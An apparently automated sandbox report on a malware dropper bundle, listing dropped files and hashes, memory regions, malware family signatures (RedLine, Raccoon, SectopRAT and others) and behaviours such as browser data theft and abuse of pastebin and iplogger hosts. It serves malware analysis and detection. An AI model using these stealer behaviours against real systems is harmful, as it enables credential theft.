C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1628-112-0x0000000000170000-0x00000000001E0000-memory.dmp

memory/2556-117-0x0000000000BF0000-0x0000000000BF8000-memory.dmp

memory/4788-119-0x0000000073900000-0x00000000740B0000-memory.dmp

memory/2864-121-0x00000000009C0000-0x0000000000A30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1628-120-0x0000000004990000-0x00000000049AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe

MD5 cf1ef22fba3b8080deab8dd3ec2dbe79
SHA1 62c57835497002d7f760fabb77969281b4ccf3e0
SHA256 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0
SHA512 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

memory/3904-139-0x0000000000890000-0x00000000008A6000-memory.dmp

memory/3904-140-0x0000000001150000-0x0000000001156000-memory.dmp

memory/1628-137-0x00000000050B0000-0x0000000005654000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-KIN1D.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/4788-144-0x0000000005A60000-0x0000000005A7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/8-148-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2812-147-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2964-151-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4788-146-0x0000000005C90000-0x0000000005CDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe

MD5 508251b34a5ea5271e6c8d365b3623d2
SHA1 a6f057ba3154fca2a2000cbb7ee9c171c682a8ac
SHA256 a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f
SHA512 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170

memory/1628-118-0x00000000049F0000-0x0000000004A66000-memory.dmp

memory/4404-116-0x0000000073900000-0x00000000740B0000-memory.dmp

memory/2964-109-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/4788-104-0x0000000005600000-0x0000000005954000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/4404-89-0x0000000073900000-0x00000000740B0000-memory.dmp

memory/4788-80-0x0000000005590000-0x00000000055F6000-memory.dmp

memory/4788-78-0x0000000005380000-0x00000000053A2000-memory.dmp

memory/4788-79-0x0000000005520000-0x0000000005586000-memory.dmp

memory/4788-68-0x0000000004CE0000-0x0000000005308000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-N4BAF.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/3036-173-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3036-172-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3036-171-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3036-170-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3036-168-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4788-191-0x0000000006DD0000-0x0000000006DEE000-memory.dmp

memory/4404-194-0x000000006F840000-0x000000006F88C000-memory.dmp

memory/4788-193-0x0000000006E00000-0x0000000006EA3000-memory.dmp

memory/4788-181-0x000000006F840000-0x000000006F88C000-memory.dmp

memory/4232-210-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4232-213-0x0000000005280000-0x000000000538A000-memory.dmp

memory/4232-214-0x00000000051B0000-0x00000000051EC000-memory.dmp

memory/4404-215-0x00000000074D0000-0x00000000074DA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed067ba5199af5f.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4232-212-0x0000000005150000-0x0000000005162000-memory.dmp

memory/4232-211-0x00000000055F0000-0x0000000005C08000-memory.dmp

memory/4788-217-0x0000000007130000-0x0000000007141000-memory.dmp

memory/4404-216-0x00000000076C0000-0x0000000007756000-memory.dmp

memory/4788-230-0x0000000007160000-0x000000000716E000-memory.dmp

memory/4404-204-0x0000000007AE0000-0x000000000815A000-memory.dmp

memory/4404-233-0x0000000007770000-0x0000000007778000-memory.dmp

memory/4788-240-0x0000000073900000-0x00000000740B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AmtZY.zXT

MD5 6dd35c1b829aa136dfa8d19a3d925b02
SHA1 5443dde6e8c2948dfa2626d58c7cf957ea9fcd2c
SHA256 07e1aecb0743f29ce796de864144cfc7d64af919ca1445dc286d1be217a94298
SHA512 536a26d31e795b8c7a8b3a4b8855465dd6b287410e2c2e41d7b5ed0dccff63757d50f3a6a85455537be16515064d801c04262b391e6a81d89540f88f6532072d

C:\Users\Admin\AppData\Local\Temp\nytFSko.4

MD5 f07fb7ba321155969395fd0bb1b66ecd
SHA1 c33f97f3bcd9152263cd3a267f7718bfe74871d4
SHA256 3b408cb12cfc6e064674313ac9b2bc6e5c479209432d8a24d60638230e6d09ee
SHA512 90e444d2035dc5d64ad62f2ced9227a9f0227a97a358afc987d4efa6a93d1adc3eb8f329a670088eade9e6fd863ed8c2a6e194278c9c61eb12db90c6c04cb1cd

C:\Users\Admin\AppData\Local\Temp\m9WDKH25.n

MD5 102c7b74c9389ba3f6b3edc9d78354a5
SHA1 1f87d39721fc1248b480f3d34f53fa06881a9e60
SHA256 a0c96cecc558707b247549e2a4543d354270f8747f2c493cd1be2adb332f991e
SHA512 9e404873661be23cd92eaada3eb8e16101df306af7eda46cc35a37c59131c1452ef50d465ef7f84a222fadf8821c24ffaa93e6b2c030ba93c44623aa7106077d

C:\Users\Admin\AppData\Local\Temp\lPmE79O.f1

MD5 3d4be60221c31167e0880e394bfc4da9
SHA1 406ce7505abb85bfe841b043a3c0c9fc4accf6c5
SHA256 736b628abd066f9bbc93148f2060e750fb8e7d1df03b6a5ab4501e1b0a7ac6db
SHA512 b08998c99352173c7d016f344292362b31b66dcb78a333a4b0deb25c0abcfcade3db9687b6e1bf866d882a0c3490b2f5d7da1e4f460eff39745df823b93ce806

C:\Users\Admin\AppData\Local\Temp\SVnzW.C2

MD5 1046521a4754730fa8d91ffe7bb86dd7
SHA1 c588fef06fa101c894d165cf58b0d930b84f32bb
SHA256 de20c6946360e923936c865b9d44e038e6046ca2c733043010913f3ed94ebfc5
SHA512 ec2ba5fde73358c65eec9e3dd61e32574a34ac580d2f0afb9f545818cbaedc2d7342f4e20dcb3e57250a1e350c3a9e05ab3fee0b3fe90feeb2fdbb34cb0654c8

C:\Users\Admin\AppData\Local\Temp\OJM3YR.x

MD5 560cd503ea8d56af71af388068c37a0a
SHA1 e33edf708a7dde97afca2f5dc04b3de35a55c5ad
SHA256 f5ba7d73b7deed6a565cba19773085927dc34123633e466129a4a7a6be840cc4
SHA512 52114327d022eeb3832742ad81b1881a8efe3e66632900298e59569cb44532aa06a63a3c65d5b1ab339b8e5e285b360584bbbe0c1db68442f478a24a81132996

C:\Users\Admin\AppData\Local\Temp\ZSPeLY.cnM

MD5 b3eb9fd17e8ad098cabb8c902e9e229b
SHA1 496db608d89ede6d7e52cc12c87fd51985d77dd3
SHA256 48ff5cfc37c60e061bc6479c3fcf221527693c3e24c18e5e23e6287d4e38f3e7
SHA512 5fdbe3bac951c3c5c0e3ab21fe308b6072f5b3cb3ee9ddb414226df52268baf860b562564b024c3d817af3b5da87511762a7220493033b74dd650bc8ccf809f9

C:\Users\Admin\AppData\Local\Temp\X5W6AA.ZS

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/4172-256-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4404-239-0x0000000073900000-0x00000000740B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 874c28a44bb613b71919f06365a823a0
SHA1 d85614eeb4e6c9517eedb93b405c4077133576e0
SHA256 77b8b49ee116b159117ac51fb2c405881beca0dc0df825e2b3020c98569f2fb9
SHA512 777df7ab41538bb2b13c56054ce7f9d593c3e5ff8f1e0bc616c438381c590d66fdf917d843154681554df8bc9a93699cea316ecca9755be9f3a264374aaea5e7

memory/4788-232-0x0000000007260000-0x000000000727A000-memory.dmp

memory/968-257-0x0000000003540000-0x00000000035E7000-memory.dmp

memory/4788-231-0x0000000007170000-0x0000000007184000-memory.dmp

memory/4788-207-0x0000000006F30000-0x0000000006F4A000-memory.dmp

memory/4788-178-0x0000000006B90000-0x0000000006BC2000-memory.dmp

memory/1124-174-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/3036-164-0x0000000000400000-0x000000000051C000-memory.dmp

memory/968-261-0x0000000003600000-0x0000000003694000-memory.dmp

memory/968-259-0x0000000003600000-0x0000000003694000-memory.dmp

memory/968-258-0x0000000003600000-0x0000000003694000-memory.dmp

memory/4404-66-0x0000000004B50000-0x0000000004B86000-memory.dmp

memory/3036-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3036-60-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3036-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3036-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3036-55-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3036-53-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3036-54-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3036-52-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3036-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3036-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1760-263-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/8-262-0x0000000000400000-0x0000000000414000-memory.dmp

memory/968-264-0x0000000000400000-0x000000000055D000-memory.dmp

memory/968-273-0x0000000003600000-0x0000000003694000-memory.dmp

memory/968-274-0x00000000036A0000-0x000000000565B000-memory.dmp

memory/968-275-0x0000000005660000-0x00000000056ED000-memory.dmp

memory/968-276-0x0000000005700000-0x0000000005789000-memory.dmp

memory/968-279-0x0000000005700000-0x0000000005789000-memory.dmp

memory/968-280-0x0000000000F20000-0x0000000000F21000-memory.dmp

memory/968-281-0x0000000000F30000-0x0000000000F34000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
